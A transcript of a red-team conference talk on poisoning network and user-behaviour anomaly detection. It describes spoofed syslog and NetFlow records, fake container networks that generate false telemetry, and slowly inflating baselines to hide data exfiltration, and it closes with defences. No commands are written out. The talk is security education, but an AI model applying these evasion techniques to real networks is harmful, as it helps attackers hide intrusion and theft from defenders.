 Alright, good morning. Thank you for coming out to the inaugural year of the Red Team Village. We're hoping to have many, many, many more years. We tried to dedicate a lot of space, so we need to get a little bit more space, but we tried to dedicate at least 30 plus percent of that space to talks because we have so many amazing people in the red space field and you had to go to all these different places to hear them and talk with them. So we've got an amazing lineup of different folks. Mr. Charles Herring, he's got an immense background. Can I talk about the School of Roots thing? Yeah, sure. You want to talk about me? There's a whole slide about me. It's my favorite topic. We're just going to do the whole hour about me. It's all about me. Anyway, well, thank you. Please give him a warm applause and then we're going to do about 45-50 minutes. Then we'll do some Q&A after that. So if you have any questions along the way, feel free to shoot a hand up and I will answer the question because that gives me an opportunity to drink my water. If you want the deck, Twitter at CharlesHerring, CharlesHerring.com will shoot you to LinkedIn. You can grab this deck from either one of those places. It's loaded to CDM. A little bit about me. This guy is actually me, though I do recognize that I look like I ate him and had an allergic reaction. Life got hard during this time. I was in the Navy for 10 years. I spent seven years fixing F-18 Hornets after 9-11, got wrapped into doing security because I was doing that for fun. Cyber security stuff, hacking stuff for fun. Ahead of that, I was detailed to be the Network Security Officer at the Naval Postgraduate School. That was also a fun time when Chris Eagle spun up to school at Root. So anyone that's old enough to remember that, one captured the flag here at DefCon a handful of times. And at the time, we're trying to figure out how to operationalize cybersecurity operations. And so I partnered with InfoWorld back before journalism died and the test center was still open and they would send all the gear and we would mess with it, put it on the network and figure out what could work, what didn't work, what type of technologies and approaches worked. Some of the stuff we're going to talk about today, Network Behavioral Anomaly Detection was done really in two vanes that were pretty successful. Georgia Tech had an arm that was doing something that later became called Stealth Watch. So it was Network Behavioral Anomaly Detection that way. The project working on it at the Naval Postgraduate School was called Therminator. You can Google that, NSA holds that code now. Left, the Navy did consulting work for about seven years. Then went back to LandCope to help them figure out how to sell something as complicated as Network Behavioral Anomaly Detection. That company got acquired by Cisco. And about four years ago, I started a project called WitFu that is setting out to orchestrate security operations. If you are interested about that, there's www.witfu.com. So here's what we're going to cover today. Going to hit on the concepts of NBAD and UBA, how it works, what the terms mean, just to define those so we're all up to speed. Then we're really going to look at how to poison that data in the context of a red cell team. People are collecting data, they're analyzing it, they want to catch attacks. We're going to look at today are some concrete techniques in messing that data up so they cannot catch the attacks that are underlying. And so it's going to be two parts. One, the techniques. So what are the commands we run and the scenarios or how do we leverage those techniques in different poisoning scenarios? So just real quick on some definitions. A signature-based definition, most of you guys know this. Signature is you're inspecting an object as it's entering the subject. So the packet, the file, it has some characteristic that's weird. If I was drinking my drink and there was mold floating on it or something weird, I'm like, okay, there's something wrong with this object. I'm not going to ingest it. I know that mold is not good, right? Behavioral detection is observing the subject after ingestion occurs. So sandboxing is really good at this. If I drink the drink and I become sick, that behavior tells me the object may have been bad, right? And then anomaly detection is looking at all of the behaviors, whether they're on the network, on the endpoint or whatever, you establish what is normal. And then if anything happens that is not categorized, whitelisted normal, it is abnormal, it is an anomaly. And so this is one area that has worked really well over the last few years and we've done a whole lot of good research as an industry on anomaly detection or what's more commonly being marketed now as machine learning, it's particularly supervised machine learning. But in the relationships, anomaly detection creates new behaviors. We see something new happening in the wild and we categorize it as a nefarious behavior. So Hartbleed a few years ago is a good example of this. When we start seeing the ratio of server bytes, client bytes, that have been exchanged across Apache are not in the realm of normal web communications. It's a net new behavior. And so we're able to tag that as an application denial of service. And then from behaviors, we are able to detect new signatures. When we see this behavior we may not know what the attack is at the time but we know the behavior is bad such as the files are being encrypted on the disk, a data is being deleted, data is being exaltrated. The behavior is bad. And so those behaviors inform us on how to build new signatures and of course the best thing about signatures are we can attach CVEs to them. We know exactly, we can look at the adversaries that created them to better understand exactly what happened. So false positives or when I say a false positive, I mean a detection of something other than an attack is high in anomaly-based detection because until you get to the point where you've categorized every behavior so you know what's normal and why it's normal, you're going to have alarms that are triggering, that are uncategorized but not nefarious. An anomaly-based detection as we look at it requires baselines. If you're establishing normal you have to define what is normal and most of the techniques we do in anomaly detection, whether it's on the network side or the user side, they're based on mathematical models, right? You can do mean, you can do different types of standard deviation, there's all kinds of models on what the baseline is, how many bytes. So what you start with is what type of metric are we looking at? Is it packets transferred per second? Is it packets transferred per second against port? So you build a mathematical set of numbers that you're going to track. Second thing you have to figure out is what is the baseline applied to? Is it applied to the entity? So are you baselining the behavior of every host or every user on the network or are you looking at set-based baselining? So all of the users in wireless or all of the hosts that are belonging to the C-suite, right? So you create sets and then baseline against sets or you baseline against entity. And that's pretty important when you look at how to exploit them. So what baseline are you going to exploit? We'll look at baseline boiling a little bit. Supervised machine learning versus unsupervised machine learning is you take all the variables and unsupervised machine learning and you find every possible relationship against the different data. So if you have packets versus port versus bytes, all these things you can look at, what are the distributions of those sets and then what do those sets mean when we see them? And that was actually one of the main pieces of the thermometer research. So as a product in the industry, Network Behavioral and Omni Detection is looking at a horizontal traffic normally inside the network, it's looking at net flow generally. There's also the ability for probe solutions. But you don't, because you're counting things, you don't need to inspect the characteristics of the payload, right? So this is one thing that's sort of safe from encryption because you don't care what's in the payload, you care what's in the header, how many packets, how many bytes, how many connections, those kind of things. It also tends to look at solving horizontal east-west conversations, what are the, how much data is being transferred to a data center, to a data center or whatever. And that's why net flow or other meta type tools work there. Almost no one definitions will get the fun part. That's a list of stuff from Gartner on people that do in BAD. Types of anomalies you look for are service traffic thresholds. So how much web traffic was consumed from China in a day, right? And so you look at that type of thing, it also fits into geographic traffic anomaly, how much traffic is impacting on a given geo. Data hoarding or data staging is, if you expect a host to consume 10 megs a day from the network services and now they just consumed 100 megs, that's a mathematical anomaly against what you expected in the baseline. So those are just observing network patterns. When we look at UBA, really what this solves is where do you do an investigation? Those of us have been doing this for a couple of decades. Remember the days where we had alarm tables? We started doing an alert at the top of the table. We had prioritized them on different types of metrics, which one was scarier, which was our confidence level, all these things that came in sort of in the really initial IDS, IPS days. And we'd work our way down that list. The next sort of thing that happened was host centric investigations to where you take the alarms and you attach them to the network devices that are generated in the alarms and then you investigate that host and so you correlate them there. And then the first part of user entity behavioral analysis is putting the alarms on the credential level. So if there's three different machines used, but one credential used, you investigate the user credential instead of the host level. And what it does is it provides a boil down of all of those alerts. So there could be hundreds or thousands of alerts that are attached to one set of credentials. So and then this is the interface that I use. This is using Cytoscape, which is a bioinformatics graph library. So when you look at user-based anomaly, I'm almost done with definitions and we'll do the actual exploits. A couple of things, geographic traffic or magic carpet type of attacks. If a guy always logs in in Columbus, Ohio, and then all of a sudden he's logging in from Tehran, that's a geographic anomaly that he doesn't, he's too far outside of where he normally logs in. A time of day if they're always logging in at 8 o'clock in the morning or during the morning hours and all of a sudden he starts logging in at 2 o'clock in the morning, that's a time of day anomaly. Different types of hosts. So when you categorize how does that user get onto the network? Is it only on guest wireless or are they logging into servers? So when those types of access change, it's also a type of anomaly. And then what services? If it's only consuming email and the internet is the baseline, then all of a sudden we're looking at something like accessing core data services like SQL or something like that, then that's an anomaly in itself. All right, so now that's a million things that do UBA. So let's talk about how to poison the data now. So there's really three types of poisoning that we're going to go over here today. The first is mass implication, which means if you have, if I'm attacking from this computer, I don't want you to investigate this computer because I'm going to make it look like everybody's attacking the network. It's not just my computer, everyone's attacking. So you have to figure out which one's the real attacker. The second one is baseline boiling, is contributing to the calculations of baselines in a way that they grow. So if you're doing something like data exfiltration or time of day, you just slowly contribute data that makes it to where the baseline is so big that it's useless, that everything is always okay, everything is always normal because you're contributing that data in a slow way. Attack masking is when we send one record to offset another record. So this is really good in recon. So if I send a send packet and a send act doesn't come back, I can generate a record that said a send act came back. So now it doesn't look like a scan anymore. It looks like a two-way handshake occurred. The ways we're going to do it is log spoofing, which means we're going to generate false logs. We're just going to lie. We're going to create a log. We're going to get it into the processing system and just write whatever we want. The second approach we do is behavioral spoofing. So we make it look like that a behavior happened on the network that didn't actually happen. And so the way that we're going to do this is, one, we can do it from a machine we own on the network. We can do it from a VM or containers. A lot of the code I'm going to give up here is going to be via Docker containers. And we can also trick networking devices into lying for us by doing fake telemetry that makes the networking device think that something happened that didn't really happen. So the end goal of this is, on the left is an attack that happened at a university of data exfiltration going from left to right. And when you look at UBA tools and tools that utilize graph theory, what you're driving for in developing these visualizations is clarity to the investigator. You take thousands or tens of thousands of events. You contextualize them against the modus operandi of the attacker. And then you render it in the investigators like, yep, someone's stealing our data. Here's where on stage two of this particular kill chain, this particular MO. And then that's easy to investigate and then the bad guys kill. What we're going to look at in poisoning is, if you can, we move to being invisible, right? We erase the records that we did in attack so that there's no record. That's actually pretty hard. So I like the second one better. Make it look like everything's screwed, right? And so make it look like every single thing on the network is infected and an attacker make everything look horrible and you can't investigate any of it. So this is what we're going to drive at in these exploits. So real quick on how to protect against this, and this is sort of the key part if you have to tell people how to fix it. We have a really bad problem with non-repudiation and logging. UDP is a really crappy way to get data logging into a system. TLS is a pain too because of the overhead of the TCP handshake as well as the encryption handshake. And for some technologies it's not even possible. RFC 5101 which establishes IP fix is a metadata for sending out network communications. It's written to support TLS encryption or transport but no one does it. So you can't buy a tool that actually complies with that part of the RFC. It also does, of course, add client overhead, server overhead. You can run into reflection, denial of service, all those things as well. And spoofing, right? So people, you can just lie. There's nothing with a UDPacket in particular that keeps you from saying in the header that I am whatever IP address I want to be. And as long as that packet can route to the destination, it looks to the server like I did that. And so tools like Cisco have the overhead of doing a reverse path lookup to make sure that if you're saying you're sending from 10.10.5.5 that you're really on that segment. Then really the other part is protecting the collection infrastructure. The tools that are generating telemetry should be in a segment that is the path to the analysis is protected. So no one on the network can send logs unless they're in an authorized segment. I also put up here Honeypot. So if you're doing any type of deception net stuff, that stuff is really cool when you run into everything's infected because you get real telemetry because nothing should be talking to a non-existent box. So it's really the tripwire of figuring out where is the real guy when all of the analysis fails. And really another core part here is as you're receiving data it needs to be tagged on how it was received, right? What listening service received it? On what port? What were the authentication components that happened? Was it sent over TLS? Was it sent over UDP? And those types of things so that when you run into a poisoning scenario you can filter out the stuff that meets the criteria of poisoning because you log that as it came in. The things we're going to go over really fit in all parts of the minor attack matrix for enterprise except for initial access. So the first technique is really simple. It's just what I call a pump and dump. So what you do is you're going to spin up a container or a VM on maybe the code on the container here in a second using a Docker container. You assign it a MAC address. You can pull an IP address from DHCP or assign your own IP address. You do stuff. Like maybe you do recon. And then you kill that container. You reassign a new MAC address, pull a new IP address, and then do something else. And so in the logging in the system you're spoofing the IP address, you're spoofing the MAC address. They can't find the machine because it vaporizes, right? So it's the same machine but it keeps popping up using different networking components. So this is a Docker version with Caledon Linux. So the first thing is that one line creates the container and it'll actually pull from Docker Hub if you have an internet connection. It establishes whatever MAC address you want to use. And this scenario is going to pull a DHCP address. So that way you know it can route. And there's a record. You do stuff. So you create the container. You start the container. It gives you a shell into the container. You do all the stuff you want to do, right? These scenarios will go through in a little bit or anything else. Then you kill the container, spin up a new one with a new MAC address, pull a new IP address, and then repeat. So it looks like you have this machine that pops up for a few minutes. It might hit something, flag it, but it's gone by the time the responders can deal with it. This one's really fun. It's what I call a pocket dimension. A lot of access switches now are sending telemetry. Wireless access points do this a lot, things like Meraki or Myst, where they just believe the traffic happening on the access point is really happening. So you spin up several containers on a fake network. And it can be on a slash two, a slash four. You might be able to get a slash zero to work, but I generally run on a slash four. And you spin up an external host. It could be a Microsoft host or whatever IP addresses you want. And then you do things to those fake machines. So it looks like 10.10.5.5 is communicating with 8.8.8.8, but it's not. It's communicating with your 8.8.8.8. And so you can generate all these false traffic patterns, whether they're inside the network or outside of the network, by creating the containers, launching the traffic that you're lying about. You're creating a behavior in this fake network. That fake network is bound to the NIC. The NIC is then being monitored by the wireless access point, a wired access point, an access switch is generating either a Syslog or NetFlow telemetry. That stuff is already configured to ship it to the Syslog or NetFlow or UBA tools. So you're generating all this fake traffic and it gets shipped out. So it looks like this. This is two different machines. You create a network bridge called Pocket, or it's a Docker network called Pocket. You assign the bridge that across to the physical network that's on the bridge command there. Spin up containers. Have the communications you want, whether that uses for boiling baselines. You could use it for doing recon. You could scan the whole internet if you want. Whatever you wanted to do, but it's happening in this fake network but generating real telemetry inside of the security architecture. This one is a little bit harder, or should be harder, is just spoofing records directly to the log collector, whether that's Syslog or NetFlow, but you have to find it first. I'll show you a couple of techniques for resolving this. First is you can look for DNS things, because people name them like syslogcollector.acme.local. Doing some basic DNS lookups will probably reveal something, give you a step towards where the collector is. If you have a compromised machine that's already generating telemetry, that's just a TCP dump on that machine to figure out what it's communicating with over NetFlow or Syslog pieces. You can just do a send scan. If something is collecting syslog, they're going to be open on 5.1.4, see if you get a SINAC back on any of those. But once you discover it, you're just going to spoof records that can say anything that you want, because record collection stinks right now. And then you can just do a pump and dump, right? Create the records, drop that machine, create more records from a new machine. So if you don't know how to send syslog over Netcat, that's how you do it. Syslog is really uncomplicated. And so you can send any message you want. Most syslog formats from different tools are very well documented. There are plugins for it, but essentially just Netcat anything you want to the port of the server, and the server will process it as if it is the gospel. So another cool way of doing is what I call it UDP spray. There's a cool project on GitHub called Samplicator. And essentially what it does is it opens up a socket and listens for a UDP packet, and you have rule-based systems to say when I receive packets from the following sources or they have the following characteristics forward those packets to the following destinations. And what it does is it maintains the original header. So even though, so if you sent from 10.1.1.1, it looks like 10.1.1.1 when it hits the final destination and not the Samplicator IP address. So you can just load up class B's worth of IP addresses. And just say I'm going to send a packet into Samplicator and it's going to spray it out to every possible destination. Some detection mechanisms may see a UDP flood or something like that because of the number of UDP packets coming out. But this is one way to get the packet to the destination if there's a route to it. So it's just like send it to everybody and whoever picks up on that log just receives a log. And that's really all that you have to do there. Samplicator is a very simple application to use and then has used the previous slide to generate the netcat message, send it to Samplicator, and then it shoots it out to all the UDP destinations. For things that are using TLS, this is some really simple Python code. That's all you need to do to send a message. You'll see the message is right here on the socket. The rest of it's just removing verification. So if the endpoint does require certificate verification, you're obviously going to have to get a hold of a good certificate here, which actually might not be too hard if you own a machine because the machine will have a certificate on it if it's already shipping logs. But that's the Python stuff there. And again, if anybody needs these slides, just add Charles Herring. CharlesHerring.com. Give them to you right here on the thumb drive that I would not recommend you plug into your machine. Next thing is, here's another approach. So there's a tool called Nprobe. There's an open source version. It sniffs the packet capture, and it creates NetFlow records. And so in the case of like a pocket dimension, you're running these different attacks. Have Nprobe generate the metadata about those fake attacks and forward those onto the collector, right? Whether you do that through a UDP spray or you already know the end destination of where you're going. So grab that from the end top. Friends over there. A lot of stuff is starting to move towards REST APIs. So Elasticsearch, Splunk, those types of devices. If you're going to make a direct write there, this is an example for Elasticsearch in the format. It really is just this message colon. So this is a JSON post to the Elasticsearch API. So you can do that. But generally if you're using Elasticsearch, you also have available somethings listening on syslog somewhere. Oh, Mike's dying. All right, so let's do a scenario. We want to recon the network, but we want to cover our tracks by making it look like everybody's reconning the network, right? And so they won't find our machine until it's way too late. So best way to do this is in a pocket dimension and generate, you can generate the fake records, right? So you're scanning everything inside of the pocket dimension which is generating all these recon records that are getting forwarded off to the infrastructure. You could also do this by spinning up as many Docker containers as you want, spoofing the IP address. It doesn't matter in recon, particularly if you're doing a send scan. If the packet comes back to the fake machines, so in the pocket dimension you can do as many as you want. You can simulate some SYN-X, but it's really good in just getting a recon done and they will know recon just happened, so the blue team will know recon just happened, but they won't be able to figure out where it actually came from or where the data was collected to shut it down. And also you could use a pump and dump here, of course, after you finish the recon from the machine that collected the data, kill the MAC address, kill the IP address, then create a new container for subsequent parts of the kill chain. This is something I talked about a little earlier, but if you're going to send, let's say you're scanning the network and you just want to create a bidirectional connection, inside of the real network, you're scanning the whole network, and if you don't get a SYN-AC back, you create a pack, you create a NetFlow record in this case that says there was a SYN-AC, that the SYN-AC did come back. So it will confuse detection mechanisms enough to prevent a scan from triggering because it has a record that the bidirectional connection actually occurred. There's also the ability to do this. There's a scanner, I'll see if I can post it later on to where it does this automatically. So you scan, the machine doesn't get a SYN-AC back and it knows where the flow collector is. You can generate a SYN-AC record from the scanner itself. So it's this really simple Python script to shoot that out. And this one's sort of the fun one here. How do you boil a baseline? So boiling a baseline and going back to the Venn diagram we had anomaly detection catches everything. As long as you have visibility on everything, it will always generate an alert, right? Unless you break the baselines. And so if you think about the metric that you want to run against, whether that's doing a geographical attack, you need to move data. Data exfiltration is a big one here. If you need to move data to a segment on the Internet that has never, that normally doesn't transact that data, you're going to create records every day of data going out there. You start with a K, right? Then the next day it's a K and a half, then it's 5K. And every day you slowly move that baseline up generating more and more telemetry that says that traffic happened that really did not happen. And so that can be done either by direct logging. So you're sending the logs directly to the collection source. Or it can be by spoofing the behavior inside of a pocket dimension, right? Where you're executing these increasingly large, whether it's data transfers, time of days, or another good one for this. Eventually you should have every user logging on a place at every hour of the day. And now you can't get no, you can never detect an anomaly in user behavior because there are no user, everyone's always working everywhere. And so it's just, in that case it's just generated a syslog record for authentication successful for user so and so. And then you just do that for every user that you need to use inside of a campaign. Any questions on that? Well, I don't care if there's any questions, but I'm going to drink this drink. Think about a question. So this is the last piece. Just recapping this to prevent this stuff from happening. If you can do TLS, client-based authentication on record collection, that is ideal. Because then you're down to protecting the public key infrastructure, right? And if you lose the public key infrastructure, you're screwed, of course, so don't let that happen. But there is overhead there. So as you're scoping out products and resources for doing the logging, it has to be mindful of the overhead that's going to go into that logging collection. And then when you're building out tools, firewalls, EDRs, all those things, they need to be wrapped into sort of their own DMZ. So if your teams have not built tooling telemetry inside of a bubble that communicates with the logging tools, you're going to have problems. If anybody can send data into the telemetry, you're sort of in trouble. But that is basically it. Get the thing there. I'll answer any questions. Thank you for having me. Applause.